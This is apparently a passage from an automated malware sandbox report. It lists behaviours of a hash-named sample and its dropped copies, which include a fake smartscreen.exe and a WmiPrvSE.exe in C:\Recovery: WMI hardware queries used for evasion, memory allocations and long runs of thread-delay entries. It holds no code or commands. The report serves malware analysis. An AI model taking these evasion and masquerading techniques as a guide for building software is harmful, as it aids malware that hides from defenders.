Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: CA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: 1A8D0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 15A0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AFC0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 31A0000 memory reserve | memory write watch
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1B380000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: AB0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1A530000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 13E0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1AED0000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1B310000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: E30000 memory reserve | memory write watch
Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1A920000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1520000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AE70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599719
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599516
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599297
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598469
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 597942
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595688
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595529
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595328
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 599562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597078
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596067
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595375
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 3600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 594234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592891
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591156
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589750
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589153
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588748
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588257
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588019
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587391
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587190
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586348
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585743
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585031
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584708
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583371
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582766
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582396
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 581172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579022
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578247
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 577641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576086
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575939
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575793
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575685
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575395
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575237
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575122
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574993
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574219
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574040
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573725
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573437
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572828
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572422
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572196
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571222
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570812
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570547
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 569516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568687
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568394
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568178
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568036
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567902
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567680
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566844
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566699
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566420
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566281
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566141
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565816
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565702
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565509
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565406
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565199
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565014
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564781
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564669
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564560
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564452
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564343
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563683
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563341
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 562002
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561887
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561438
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561328
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561157
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561047
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560934
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560817
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560703
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560585
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559757
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Window / User API: threadDelayed 653
